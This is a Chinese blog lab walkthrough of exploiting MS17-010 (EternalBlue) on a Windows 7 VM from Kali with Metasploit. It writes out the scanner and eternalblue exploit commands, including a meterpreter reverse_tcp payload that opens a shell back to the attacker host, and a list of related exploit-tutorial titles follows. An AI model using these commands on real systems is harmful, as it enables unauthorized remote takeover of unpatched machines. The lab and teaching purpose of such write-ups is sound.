本文目录

  • 永恒之蓝概述
  • 实验环境
  • 实验过程
    • 第一步:扫描漏洞
    • 第二步:渗透攻击
    • 第三步:漏洞利用
      • 截屏

永恒之蓝概述

ms17-010(永恒之蓝)漏洞是由Shadow Brokers(影子经纪人)在2017年4月公布的大批漏洞之一,该漏洞利用Windows系统的SMB漏洞可以获取系统最高权限。曾经席卷全球的Wanna cry勒索病毒就是不法分子基于该漏洞进行改造。

实验环境

攻击机:Kali Linux
攻击机ip地址:192.168.0.133

被攻击机:Windows 7 Home Basic 7601 Service Pack 1 x64
被攻击机ip地址:192.168.0.135
环境搭建传送门:Kali Linux安装与使用指南

实验过程

第一步:扫描漏洞

进入msf以后我们用search ms17-010查找该漏洞有关的模块

扫描目标主机存不存在该漏洞我们用auxiliary/scanner/smb/smb_ms17_010这个模块
使用方法

use auxiliary/scanner/smb/smb_ms17_010
set rhosts   192.168.0.135
set threads  100
run


我们可以看到该主机存在该漏洞

第二步:渗透攻击

利用exploit/windows/smb/ms17_010_eternalblue模块来攻击该机器

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.0.135
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.133
run

其中 rhost为目标主机iplhost为攻击机器的ip




从结果来看,显示攻击成功并且拿到了shell权限了,这时候我们就可以为所欲为

第三步:漏洞利用

输入help可以查看能够利用的命令

截屏



其他操作我们根据meterpreter 相关的命令执行即可。

metasploit实战-ms17-010(永恒之蓝)漏洞利用与复现相关推荐

  1. MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...

  2. 永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图

    永恒之蓝漏洞利用(MS17-010) 文章目录 永恒之蓝漏洞利用(MS17-010) 一.永恒之蓝(MS17-010)介绍 二.漏洞利用 1.检测目标主机是否存在MS17-010漏洞 2.使用msf攻 ...

  3. MSF之ms17-010永恒之蓝漏洞利用

    MSF之ms17-010永恒之蓝漏洞利用 准备 扫描漏洞 漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali ...

  4. SMB协议与永恒之蓝漏洞利用

    一,SMB服务 SMB(全称为Server Message Block)是一个协议名,可用于在计算机间共享文件.打印机,串口等,电脑上的网上邻居就是靠他实现的: SMB是一个应用层协议,可以工作在NE ...

  5. 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)

    一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...

  6. 永恒之蓝漏洞利用及攻击

    一.基础知识介绍: 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机.甚 ...

  7. 永恒之蓝漏洞利用攻击以及修复方法

    靶机:Windows 7(有的版本有补丁) 攻击机:Kali 2021 首先保证可以互相ping 通 32位系统进去控制台会蓝屏 漏洞利用 用nmap的漏洞扫描模式,扫描过程按上下方向键即可查看扫描进 ...

  8. MS17-010永恒之蓝-漏洞利用+修复方法

    前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. 该病毒是不法分子利用NSA(National Security Agenc ...

  9. 可刑又可拷!永恒之蓝漏洞原理及复现

    一.永恒之蓝介绍 1.什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. 2 ...

最新文章

  1. stk 坐标系_STK学习-坐标系
  2. 如何通过五个简单步骤成为更好的Stack Overflow用户
  3. python解释器工作原理_Python解释器执行原理
  4. adf4351_使用ADF BC管理保存点
  5. Java当中Collections的用法
  6. 13muduo_base库源码分析(四)
  7. 从工作组向域管理转型该如何设置?
  8. 如何安装ArchLinux
  9. linux环境变量如何设置
  10. 【机器学习系列】GMM第二讲:高斯混合模型Learning问题,最大似然估计 or EM算法?
  11. Linux下Oracle数据库的启动过程、关闭过程
  12. 计算机一级操作题题库在线,全国计算机一级操作题「题库」
  13. 小程序实现简单语音聊天
  14. 微信小程序—Flex布局
  15. android弹球游戏小球运动,球球跳一跳跳舞弹球
  16. 百度地图如何拾取经纬度
  17. 最彻底的玩客云绝育方法-避免持续读写损伤硬盘和资料
  18. 模仿“选择游戏角色的页面”
  19. 将多个class文件打包为jar包
  20. 常见网络摄像机(摄像头)的端口及RTSP地址

热门文章

  1. 造轮子-html标签清理
  2. Spring MVC面试常问
  3. 我看德国公司IT部门与国内的差异
  4. 广东迅视看2020年三项社会保险基金,首次出现收不抵支?
  5. pytorch实现 wgan
  6. 索罗斯金融炼金术的重要信息
  7. 论文笔记 ​​​​​​​---语音关键词检测方法综述
  8. 读书笔记----哲学家们都干了什么
  9. 怎么查看tensorflow的版本
  10. 视频教程-血腥大地-第一季-其他